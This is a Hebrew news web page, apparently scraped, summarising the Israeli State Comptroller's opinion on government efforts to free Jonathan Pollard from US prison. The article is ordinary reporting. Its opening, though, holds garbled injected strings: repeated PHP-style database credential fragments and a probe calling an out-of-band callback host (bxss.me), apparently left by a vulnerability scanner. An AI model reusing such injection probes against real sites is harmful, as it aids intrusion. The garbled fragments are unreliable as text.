$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מה עשו ממשלות ישראל בעניין שחרורו של יהונתן פולארד מהכלא האמריקאי
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מה עשו ממשלות ישראל בעניינו של יהונתן פולארד

תאריך: 09/08/2010 15:46   מחבר: מערכת האתר

ב-21.11.85 נעצר יהונתן פולארד (יליד 1954) ליד שגרירות ישראל בוושינגטון לאחר ביצוע פעילות למען "הלשכה לקשרי מדע" (הלק"ם) שנמשכה במשך כשנה וחצי. מאז  הוא כלוא בארה"ב. פולארד הוכר כאזרח ישראלי בנובמבר 1995 וכסוכן ישראלי במאי 1998.

בקשה לחוות דעת

הוועדה לענייני ביקורת המדינה של הכנסת,קבלה החלטה ביום 1.12.07 לבקש ממבקר המדינה להכין חוות דעת אודות פעולות ממשלות ישראל בנוגע לטיפול ולמאמצים להביא לשחרורו של יהונתן פולארד כאזרח המדינה מהכלא האמריקאי , וכמי שהוכר על ידי הממשלה כסוכן ישראלי.

לפי העולה מחוות דעתו של מבקר המדינה, הקים מבקר המדינה צוות מצומצם לידו. במהלך עבודתו, בחן הצוות מסמכים רבים שהונחו על שולחנו, כמו כן, נפגש עם ראשי ממשלות ישראל, שרים ויועציהם וכן עם רבים נוספים, לרבות בעלי תפקידים בתחומי הביטחון והחוץ בעבר ובהווה. עוד נפגש הצוות עם באי כוחו של פולארד, שיכלו לשפוך אור על פעולות ממשלות ישראל לשחרור פולארד מן הכלא האמריקני

לפי הנטען בחוות דעתו של המבקר ולאחר שחוות הדעת הוגשה, החליטה הוועדה לענייני ביקורת המדינה בהתייעצות עם מבקר המדינה ביום 2.9.09, שלא להניח חוות דעת זו במלואה על שולחן הכנסת, ולפרסם רק חלקים מהתקציר שלה; זאת, לשם שמירה על ביטחון המדינה.

ממצאי הביקורת

מנתוני הבדיקה עלה, כי קיימת התנגדות חריפה ביותר ועקבית של גורמי הממשל בארה"ב לשחרור פולארד. ההתנגדות החריפה מתמקדת בקהילת המודיעין האמריקנית, בטענה שהשחרור נוגד את האינטרס הביטחוני של ארה"ב.

עוד מצא המבקר כי שחרור פולארד מהכלא האמריקני עמד לנגד עיני ראשי הממשלה בישראל בשנים האחרונות. כל אימת שנפגשו ראשי הממשלה, נתניהו, ברק ואולמרט, עם ראשי הממשל האמריקאי, הועלה נושא שחרורו של פולארד. עם זאת ולצערו של המבקר כלשון חוות דעתו, השיחות של ראשי הממשלה לא תועדו. הדיונים היו בפורומים מצומצמים. לא התקיימו דיונים בפורום שרים בדבר הדרכים שיש לנקוט לשחרור פולארד. 

מסקנות והמלצות

לדעת המבקר, אי-תיעוד הפגישות בעניין זה הוא ליקוי בעל משמעות, וראוי היה, כי הפגישות בין ראשי הממשלה לנשיאי ארה"ב בעניין פולארד יתועדו - כך בעבר; קל וחומר - בעתיד, ושיוכן סיכום לקחי הפעולות בנושא זה.

לשיטתו של המבקר, יש לגבש מתווה לפעולות בעתיד אשר ישמש את ראשי הממשלה ועוזריהם המתחלפים כזיכרון ארגוני חיוני וכתשתית שלמה ואחודה לבחינה מתמשכת של כיווני פעולה.

עוד הוסיף המבקר לטעון כי התקיימו מגעים רשמיים בין ישראל לבין גורמי ממשל ואנשי קונגרס, מול המערכת המשפטית והתביעה בארה"ב וכן מול גורמים נוספים. בסופו של דבר כל המאמצים לשחרורו של פולארד לא צלחו.